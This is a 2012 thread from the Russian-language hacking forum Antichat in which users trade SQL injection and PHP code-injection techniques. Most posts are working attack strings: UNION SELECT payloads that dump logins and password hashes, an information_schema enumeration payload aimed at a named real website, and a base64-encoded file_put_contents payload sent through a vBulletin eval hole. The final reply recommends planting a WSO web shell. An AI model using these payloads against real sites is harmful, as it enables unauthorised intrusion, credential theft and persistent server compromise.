ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

02.02.2012, 01:11
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
Сообщение от sl1k
sl1k said:
подскажите в чем пробл.
id=-983 GROUP BY 2 -- через group выяснил что 2 поля
но когда делаю
id=-983 UNION SELECT 1,2
все равно пишет что Query failed: The used SELECT statements have a different number of columns
несколько запросов, используйте error based метод
|
|
|

02.02.2012, 01:13
|
|
Guest
Сообщений: n/a
Провел на форуме: 40748
Репутация:
78
|
|
Сообщение от sl1k
sl1k said:
подскажите в чем пробл.
id=-983 GROUP BY 2 -- через group выяснил что 2 поля
но когда делаю
id=-983 UNION SELECT 1,2
все равно пишет что Query failed: The used SELECT statements have a different number of columns
пробуй UNION ALL SELECT 1,2
|
|
|
|

02.02.2012, 01:20
|
|
Новичок
Регистрация: 31.07.2009
Сообщений: 1
Провел на форуме: 4819
Репутация:
0
|
|
Сообщение от Boolean
Boolean said:
пробуй UNION ALL SELECT 1,2
результат тоже
c error based буду разбираться ибо новичок в sql пока
|
|
|

02.02.2012, 05:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 4744
Репутация:
4
|
|
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?
|
|
|
|

02.02.2012, 05:34
|
|
Guest
Сообщений: n/a
Провел на форуме: 13201
Репутация:
17
|
|
Сообщение от Киев
Киев said:
Такой вопрос
index.php?kat=2&kp=-39+union+select+(pass)+from+user+limit+0,1/*
Таким запросом я могу просматривать хэши, меняя только значения limit,
а каким запросом можно перемаслать Юзверей?
Ты имеешь ввиду логины ?
ну например так
index.php?kat=2&kp=-39+union+select+ concat_ws(0x2F,login,pass)+from+user+limit+0,1/*
вывод будет логин/хеш
или так
index.php?kat=2&kp=-39+union+select+ concat(login,0x2F,pass)+from+user+limit+0,1/*
вывод будет такой же
|
|
|
|

02.02.2012, 13:22
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от pirat0
pirat0 said:
http://mastiff-dog.com/index.php?PageT=ReadNews&act=Empty&ID=-87
ребята прошу просто посмотреть есть ли тут инъекцыя??
В других параметрах
_http://mastiff-dog.com/index.php?PageT=ForSale&act=&CatID=-1+union+select+1,2,3,(select(@x)from(select(@x:=0x 00),(select(null)from(information_schema.columns)w here(table_schema!=0x696e666f726d6174696f6e5f73636 8656d61)and(0x00)in(@x:=concat(@x,0x3c62723e,table _schema,0x2e,table_name,0x3a,column_name))))x),5,6 ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4+--+
|
|
|
|

02.02.2012, 15:23
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
пытаюсь создать файл
Powered by vBulletin® Version 3.8.5
file_put_contents('lala.php', '');
allow_url_include=Off
disable_functions=no value
magic_quotes_gpc=On
http://www.site.com/forum/faq.php?cmd=bas64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTs=
выводит
Fatal error: Call to undefined function bas64_decode() in /var/www/site.com/forum/faq.php(329) : eval()'d code(1) : eval()'d code on line 1
что можно еще сделать?
|
|
|
|

02.02.2012, 15:27
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме: 2101094
Репутация:
672
|
|
er9j6@
base64_decode
|
|
|

02.02.2012, 15:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 107835
Репутация:
23
|
|
Сообщение от Konqi
Konqi said:
er9j6@
base64_decode
http://www.site.com/forum/faq.php?cmd=base64_decode($_GET[a]);&a=ZmlsZV9wdXRfY29udGVudHMoJ2xhbGEucGhwJywgJzw/IGVjaG8gNTAvMjsgPz4nKTsNCg==
все равно выводит
404 - Компонент не найден!
|
|
|
|

02.02.2012, 15:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 102354
Репутация:
267
|
|
2er9j6@,
vbulletin? Тогда смело ставь код пакованного WSO ~25kb. Потом лей как хочешь =)
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|